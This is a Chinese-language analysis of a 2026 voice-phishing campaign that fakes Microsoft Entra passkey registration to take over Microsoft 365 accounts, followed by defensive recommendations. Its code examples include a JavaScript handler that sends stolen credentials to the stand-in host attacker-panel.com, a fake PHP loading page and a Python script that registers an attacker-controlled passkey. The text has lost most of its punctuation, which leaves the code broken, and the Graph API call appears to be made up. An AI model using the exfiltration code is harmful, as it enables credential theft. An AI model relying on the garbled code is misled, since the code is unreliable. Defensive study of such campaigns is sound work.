摘要针对 2026 年 4 月以来 O-UNC-066 威胁组织发起的新型语音钓鱼Vishing攻击本文深入剖析其伪造 Microsoft Entra 通行密钥注册流程、劫持 Microsoft 365 账户的技术机理与攻击链路。该攻击以 “推进无密码安全升级” 为伪装结合实时人工交互与定制化钓鱼工具包绕过传统多因素认证MFA实现攻击者可控通行密钥的恶意注册最终达成数据窃取与勒索目的。本文从攻击背景、技术流程、核心缺陷、防御策略四方面展开研究结合代码示例揭示攻击技术细节总结防御体系构建路径为企业应对此类高级身份欺诈威胁提供技术参考与实践指引。1 引言随着企业数字化转型深化Microsoft 365 成为全球超 85% 财富 500 强企业的核心办公平台其身份认证体系 Microsoft Entra ID原 Azure AD承载着账户安全与权限管控的核心职能。为抵御传统密码泄露与钓鱼攻击风险微软大力推广通行密钥Passkey无密码认证技术该技术基于 FIDO2 协议具备抗钓鱼、不可复制的安全特性被视为身份认证领域的重要安全升级。然而安全技术的普及过程往往伴随新型攻击手段的衍生。2026 年 4 月Okta 威胁情报团队监测到 O-UNC-066 威胁组织发起的定向攻击活动该组织隶属于 Pink 勒索集团针对食品饮料、科技、医疗、汽车、建筑及航空等多行业企业以语音钓鱼为核心手段伪造 Microsoft Entra 通行密钥注册流程诱导用户完成恶意认证操作最终劫持企业 Microsoft 365 账户。与传统钓鱼攻击窃取凭证或 MFA 验证码的单一目标不同此次攻击呈现 “伪装性强、交互实时、链路完整、危害持久” 的特征。攻击者并非直接破解通行密钥技术而是利用企业推广无密码认证的业务场景与用户对官方安全流程的信任通过定制化 PHP 钓鱼工具包实时适配用户 MFA 类型在用户完成 “虚假注册” 操作的同时秘密注册攻击者可控的通行密钥实现对目标账户的持久化未授权访问。反网络钓鱼技术专家芦笛指出此次攻击突破了传统钓鱼攻击的技术边界标志着身份欺诈已进入 “利用安全升级流程实施攻击” 的新阶段。攻击者将微软主导的安全推广活动转化为攻击入口结合语音社交工程与实时技术操控形成 “人机协同” 的高级攻击模式其危害远超普通钓鱼攻击一旦企业账户被劫持核心业务数据、敏感财务信息及客户资料将面临泄露与勒索风险。本文以 O-UNC-066 组织的攻击活动为研究对象基于 The Hacker News 等权威安全媒体披露的技术细节系统拆解攻击全链路分析技术漏洞与人性弱点的耦合作用提供可复现的技术代码示例构建针对性防御体系为企业抵御此类高级身份钓鱼攻击提供理论支撑与实践方案。2 攻击背景与核心要素2.1 攻击组织与活动范围此次攻击的发起组织被 Okta 追踪命名为 O-UNC-066隶属于知名网络勒索集团 Pink该集团长期专注于企业数据窃取与勒索攻击擅长利用社交工程与定制化恶意工具突破企业防线。攻击活动自 2026 年 4 月启动截至 7 月已覆盖全球多个国家和地区的数十家企业行业分布集中于食品饮料、科技研发、医疗健康、汽车制造、建筑工程及航空运输等领域此类行业普遍存在核心数据密集、员工安全意识参差不齐、依赖 Microsoft 365 协同办公的特点成为攻击者的重点目标。2.2 攻击核心载体伪造通行密钥注册流程通行密钥Passkey是微软基于 FIDO2 协议推出的无密码认证技术用户通过设备手机、安全密钥生成唯一密钥对公钥存储于 Microsoft Entra ID私钥留存于用户设备认证时无需输入密码仅需设备验证即可完成登录具备抗钓鱼、防泄露的安全优势。微软为推动通行密钥普及允许管理员配置注册推广策略在用户登录时弹窗提示注册通行密钥这一正常安全推广流程成为攻击者的核心伪装载体。攻击者注册包含 “passkey” 关键词的仿冒域名如microsoft-passkey-security.com搭建与微软官方界面高度一致的通行密钥注册页面从视觉、流程、交互逻辑全方位复刻官方流程普通用户难以通过界面细节辨别真伪。2.3 攻击关键手段语音钓鱼Vishing语音钓鱼Vishing是传统电话诈骗与网络钓鱼的结合体攻击者通过电话沟通实施社交工程利用语音传递的信任度诱导用户执行恶意操作。此次攻击中攻击者精准把握企业 IT 运维场景特点伪装成企业 IT 支持团队或安全部门人员以 “公司强制推进无密码安全升级、需紧急注册通行密钥保护账户安全” 为话术降低用户警惕性。相较于邮件、短信钓鱼语音钓鱼具备三大核心优势一是即时交互性攻击者可实时回应用户疑问消除用户疑虑二是信任传递性语音沟通更易建立权威感用户对 “内部 IT 人员” 的信任度远高于陌生短信链接三是场景适配性贴合企业内部安全通知的沟通场景伪装性极强。2.4 攻击工具定制化 PHP 钓鱼工具包O-UNC-066 组织使用基于 PHP 开发的定制化钓鱼工具包该工具包采用面板化控制架构攻击者通过后台面板实时操控攻击流程适配不同用户的安全配置。工具包具备三大核心功能一是界面动态复刻实时同步微软官方通行密钥注册页面样式规避静态特征检测二是 MFA 自适应可自动识别用户账户配置的 MFA 类型TOTP、推送通知、短信验证码动态展示对应虚假验证页面三是实时数据传输将用户输入的凭证、MFA 验证码实时同步至攻击者后台支持攻击者同步操作官方系统。3 攻击技术流程详细拆解此次攻击全链路分为前期准备、语音诱导、虚假认证、密钥注册、数据窃取与勒索五大阶段各阶段衔接紧密形成完整闭环核心技术操作集中于虚假认证与密钥注册阶段以下结合技术细节与代码示例逐一拆解。3.1 前期准备阶段攻击者在发起攻击前完成三项核心准备工作为后续攻击落地奠定基础。目标信息收集通过公开渠道企业官网、社交平台、员工通讯录收集目标企业员工姓名、职位、企业邮箱域名、Microsoft 365 租户信息及 IT 部门沟通话术确保语音诱导环节的话术贴合企业实际场景。仿冒域名与页面搭建注册包含 “microsoft”“passkey”“security” 等关键词的仿冒域名规避域名黑名单检测基于 PHP 搭建钓鱼网站复刻微软 Entra 通行密钥注册页面的 HTML、CSS 样式确保页面布局、颜色、按钮文字与官方完全一致仅隐藏恶意逻辑代码。钓鱼工具包配置在 PHP 工具包后台配置目标企业域名、MFA 适配规则、数据传输接口设置加载页面延迟时间通常 3-5 秒为攻击者后台操作预留时间配置 BIP 39 风格的恢复短语生成模块用于转移用户注意力。3.2 语音诱导阶段此阶段核心目标是通过语音社交工程诱导用户点击仿冒链接进入虚假注册流程具体流程如下电话接入攻击者使用网络电话伪装成企业内部号码拨打目标员工电话开口话术为 “您好我是公司 IT 安全部根据总部安全要求需为您的 Microsoft 365 账户注册通行密钥避免账户被攻击这是强制安全升级请您配合”。疑虑化解当用户提出疑问如 “为何突然要求注册”“之前未收到通知”攻击者以 “紧急安全补丁、针对近期钓鱼攻击防范、未注册将冻结账户” 等话术施压同时发送包含仿冒域名的短信 / 企业微信消息消息内容为 “通行密钥注册链接[仿冒链接]点击后按提示操作10 分钟内完成否则影响办公”。引导进入流程确认用户点击链接后攻击者告知用户 “页面加载可能较慢请耐心等待有任何问题随时说”为后续虚假认证阶段的后台操作预留时间。3.3 虚假认证阶段核心技术环节用户点击仿冒链接后进入攻击者搭建的虚假注册页面此阶段攻击者通过 PHP 工具包实时适配用户 MFA 类型窃取凭证与验证码核心流程与技术实现如下加载页面伪装用户访问链接后工具包首先展示 3-5 秒的 “系统加载中”“正在连接微软安全服务器” 等虚假加载页面一方面复刻官方流程另一方面为攻击者后台登录官方 Microsoft 365 账户预留时间。以下为加载页面核心代码示例?php// 虚假加载页面控制逻辑$loadingTime 3; // 加载时间3秒sleep($loadingTime);header(Location: login.php); // 加载完成跳转至虚假登录页?!DOCTYPE htmlhtmlheadtitleMicrosoft Entra 安全更新/titlestylebody { text-align: center; padding-top: 50px; }.loading { font-size: 18px; color: #0078d4; }/style/headbodydiv classloading正在连接微软安全服务器请稍候.../div/body/html窃取账户凭证加载完成后跳转至虚假登录页面提示用户输入 Microsoft 365 邮箱账号与密码用户输入后凭证通过 AJAX 实时传输至攻击者后台数据库同时工具包提示 “正在验证账号密码”。以下为凭证窃取核心代码示例// 前端凭证提交与传输逻辑document.getElementById(loginForm).addEventListener(submit, function(e) {e.preventDefault();const username document.getElementById(username).value;const password document.getElementById(password).value;// 实时传输凭证至攻击者后台fetch(https://attacker-panel.com/steal-creds.php, {method: POST,headers: { Content-Type: application/json },body: JSON.stringify({ username, password })}).then(res res.json()).then(data {if(data.success) {// 凭证传输成功跳转至MFA验证页window.location.href mfa.php;}});});自适应 MFA 验证攻击者后台获取凭证后同步登录官方 Microsoft 365 账户触发 MFA 验证同时钓鱼工具包根据用户账户配置的 MFA 类型动态展示对应的虚假验证页面。若用户配置 TOTP如微软验证器则展示 6 位数字输入框若配置推送通知则展示 “请点击手机推送的允许按钮”若配置短信验证则展示 “请输入短信验证码”。窃取 MFA 验证码用户输入 MFA 验证码后工具包实时传输至攻击者后台攻击者将验证码输入官方 MFA 验证页面完成身份认证登录用户账户。3.4 恶意通行密钥注册阶段核心危害环节完成 MFA 验证后用户进入虚假通行密钥注册页面此阶段核心目标是转移用户注意力秘密注册攻击者可控的通行密钥具体流程如下虚假注册引导页面提示 “请点击下方按钮注册通行密钥注册后请保存恢复短语用于账户找回”同时展示 BIP 39 风格的 12 位英文恢复短语如 “apple banana cloud date”告知用户 “务必记录保存丢失将无法找回账户”。注意力转移用户专注记录恢复短语时后台同步执行恶意操作 —— 攻击者在已登录的用户账户中发起通行密钥注册请求使用攻击者控制的安全密钥或设备完成密钥注册将攻击者设备的公钥绑定至用户 Microsoft Entra 账户。注册成功伪装密钥注册完成后虚假页面提示 “通行密钥注册成功您的账户已升级为无密码安全保护可关闭页面”用户误以为操作完成实际账户已被绑定攻击者可控的通行密钥。以下为恶意密钥注册辅助代码示例模拟后台同步操作# 攻击者后台模拟通行密钥注册基于微软Graph APIimport requestsimport json# 攻击者获取的用户访问令牌access_token USER_ACCESS_TOKEN_FROM_STEALheaders {Authorization: fBearer {access_token},Content-Type: application/json}# 恶意注册攻击者设备的通行密钥passkey_data {displayName: Attacker-Passkey,publicKey: ATTACKER_DEVICE_PUBLIC_KEY}response requests.post(https://graph.microsoft.com/v1.0/me/passkeys,headersheaders,datajson.dumps(passkey_data))if response.status_code 201:print(恶意通行密钥注册成功)3.5 数据窃取与勒索阶段攻击者成功注册可控通行密钥后无需依赖用户凭证或 MFA即可随时登录用户 Microsoft 365 账户实施后续恶意操作。数据窃取重点窃取 SharePoint、OneDrive 中的企业核心文档、财务报表、客户信息及邮箱敏感邮件同时导出账户通讯录与权限配置信息。权限提升若用户账户具备管理员权限攻击者将进一步提升权限创建后门账户、修改安全策略、禁用 MFA 保护实现对企业租户的全面控制。勒索攻击窃取核心数据后攻击者向企业发送勒索邮件威胁公开泄露数据要求企业支付比特币等加密货币赎金Pink 集团通常设定数万美元至数十万美元不等的赎金金额。4 攻击核心缺陷与漏洞分析此次攻击并非利用 Microsoft Entra ID 的零日漏洞而是安全技术推广流程漏洞、身份认证机制设计缺陷与人性弱点的耦合产物核心缺陷可分为技术层面与管理层面两类。4.1 技术层面缺陷通行密钥注册流程无强身份校验微软 Entra ID 允许已通过密码 MFA 认证的用户直接注册通行密钥未设置二次身份校验或管理员审批环节。攻击者通过窃取凭证与 MFA 验证码完成初始认证后可直接发起密钥注册请求系统无法区分是用户本人操作还是攻击者操作。钓鱼页面无权威域名校验微软官方通行密钥注册页面仅存在于login.microsoftonline.com等官方域名但系统未强制校验注册请求的域名来源。攻击者可通过任意仿冒域名复刻页面诱导用户提交信息官方系统无法拦截非官方域名发起的认证请求Microsoft。MFA 适配机制被滥用Microsoft Entra ID 支持多种 MFA 类型且允许用户自主配置这一设计初衷是提升用户体验但被攻击者利用。定制化钓鱼工具包可自动适配用户 MFA 类型动态展示虚假验证页面大幅提高 MFA 验证码窃取成功率。缺乏异常密钥注册告警微软默认安全策略未对 “陌生设备通行密钥注册”“短时间内多次密钥注册” 等异常行为设置实时告警。攻击者完成恶意注册后企业与用户无法及时察觉导致攻击潜伏期长达数周甚至数月。4.2 管理层面缺陷安全推广话术被利用企业推进无密码认证时普遍采用 “强制升级、紧急安全补丁、不注册冻结账户” 等话术与攻击者语音诱导话术高度相似导致用户难以区分官方通知与钓鱼攻击。员工安全意识薄弱多数员工对通行密钥技术原理、官方注册渠道不了解缺乏对语音钓鱼、仿冒页面的辨别能力易被 “IT 安全部” 的权威身份与紧急话术诱导。身份认证权限管控松散部分企业为简化管理为普通员工分配过高权限或未严格遵循最小权限原则导致攻击者劫持普通员工账户后可通过权限提升访问核心数据。安全监控机制不完善企业未部署针对 Microsoft 365 账户的异常行为监控系统无法实时监测陌生设备登录、异地登录、密钥注册、数据批量导出等高危操作错失攻击早期拦截时机。反网络钓鱼技术专家芦笛强调此次攻击的核心本质并非技术漏洞而是安全技术、管理流程与人员意识的协同失效。攻击者精准抓住企业推广无密码认证的窗口期利用流程漏洞与人性弱点将安全升级转化为攻击入口这种 “借力打力” 的攻击思路比传统漏洞利用更具隐蔽性与危害性。5 防御策略与体系构建针对 O-UNC-066 组织发起的伪造通行密钥注册钓鱼攻击结合攻击链路与核心缺陷从技术防护、管理规范、人员培训、应急响应四方面构建全方位防御体系形成闭环防护能力。5.1 技术防护措施部署域名与页面仿冒检测系统配置企业级 DNS 安全策略拦截包含 “microsoft”“passkey” 等关键词的仿冒域名访问部署网页信誉检测工具识别与微软官方页面高度相似的仿冒页面实时告警并拦截访问Microsoft。强化通行密钥注册校验在 Microsoft Entra ID 中配置自定义安全策略开启通行密钥注册二次校验 —— 要求注册时提供管理员审批、设备证书校验或额外生物识别验证限制陌生设备、异地 IP 发起的密钥注册请求。部署实时异常行为监控利用微软 Defender for Cloud Apps 或第三方安全工具监控 Microsoft 365 账户异常行为包括陌生设备登录、异地登录、短时间内多次密钥注册、非工作时段数据批量导出等一旦触发告警立即锁定账户并阻断操作。禁用非必要 MFA 类型简化企业 MFA 配置优先使用推送通知 数字匹配、硬件安全密钥等安全性更高的 MFA 方式禁用短信验证码等易被窃取的 MFA 类型定期审计 MFA 配置杜绝弱认证方式。部署邮箱与语音钓鱼防护配置邮箱反钓鱼策略拦截包含仿冒域名、“通行密钥注册” 等关键词的可疑邮件部署企业电话系统白名单限制外部陌生号码接入内部员工电话阻断语音诱导渠道。5.2 管理规范优化规范安全推广话术企业推进无密码认证等安全升级时制定统一、明确的通知话术明确官方注册渠道、联系人、咨询方式严禁使用 “强制升级、不注册冻结账户” 等易被攻击者利用的话术通过企业官网、内部办公系统等权威渠道发布通知避免单一电话、短信通知。严格落实最小权限原则对 Microsoft 365 账户权限进行全面审计删除冗余权限确保普通员工仅拥有办公所需的最小权限管理员账户单独管理开启多重防护严禁用于日常办公。定期安全配置审计每周审计 Microsoft Entra ID 安全策略、MFA 配置、通行密钥注册记录每月开展账户权限审计、异常登录日志审计及时发现并处置潜在风险。建立供应商安全审核机制若企业使用第三方身份管理工具或服务严格审核供应商安全资质定期开展安全渗透测试避免第三方工具引入安全漏洞。5.3 人员安全培训开展专项钓鱼攻击培训定期组织员工学习语音钓鱼、仿冒通行密钥注册等新型钓鱼攻击案例讲解攻击话术、仿冒页面特征、官方注册渠道提升员工辨别能力。明确安全操作规范告知员工微软官方通行密钥注册仅通过login.microsoftonline.com域名不会通过电话、短信发送外部链接官方 IT 人员不会要求员工提供密码、MFA 验证码或记录恢复短语遇到可疑情况立即通过企业内部安全热线或 IT 部门核实。模拟钓鱼演练每季度开展语音钓鱼、邮件钓鱼模拟演练测试员工安全意识对演练中易受骗员工开展一对一专项培训强化安全认知。5.4 应急响应机制账户锁定与阻断一旦发现账户异常登录、恶意通行密钥注册立即锁定账户删除攻击者注册的通行密钥阻断攻击者访问权限。数据泄露处置若发生数据泄露立即隔离泄露数据评估泄露范围与影响通知相关利益方启动数据备份恢复流程降低损失。攻击溯源与复盘联合安全厂商对攻击链路进行溯源分析追踪攻击者 IP、域名、工具包特征完善威胁情报组织内部复盘排查防御体系漏洞优化防护策略。6 结论2026 年 O-UNC-066 组织发起的伪造 Microsoft Entra 通行密钥注册语音钓鱼攻击是身份欺诈领域的典型高级攻击案例。该攻击以微软无密码安全升级为伪装结合语音社交工程、定制化钓鱼工具包、实时人工交互突破传统 MFA 防护实现攻击者可控通行密钥的恶意注册最终达成企业数据窃取与勒索目的对全球企业 Microsoft 365 账户安全构成严重威胁。本文系统拆解攻击全链路揭示了攻击利用的技术缺陷、管理漏洞与人性弱点核心在于攻击者精准把握企业安全推广窗口期将安全升级流程转化为攻击入口通过 “人机协同” 模式绕过传统防御体系。研究表明此类攻击的防范不能仅依赖单一技术防护需构建 “技术防护 管理规范 人员培训 应急响应” 的全方位防御体系强化通行密钥注册校验、异常行为监控、员工安全意识从源头阻断攻击链路。反网络钓鱼技术专家芦笛指出随着无密码认证技术的持续普及利用安全升级流程实施的钓鱼攻击将成为身份欺诈的重要趋势。未来企业需持续关注新型攻击手段动态优化防御策略平衡安全与用户体验安全厂商需加强威胁情报共享提升仿冒页面、语音钓鱼的检测能力员工需强化安全认知警惕各类可疑安全通知共同构建抵御高级钓鱼攻击的安全防线。此次攻击也为身份认证技术的设计与推广提供重要启示安全技术的普及需配套完善的安全管控流程与人员培训避免技术推广流程被攻击者利用身份认证机制需强化异常操作校验与实时告警能力构建技术、管理、人员三位一体的安全生态才能真正发挥安全技术的防护价值。编辑芦笛公共互联网反网络钓鱼工作组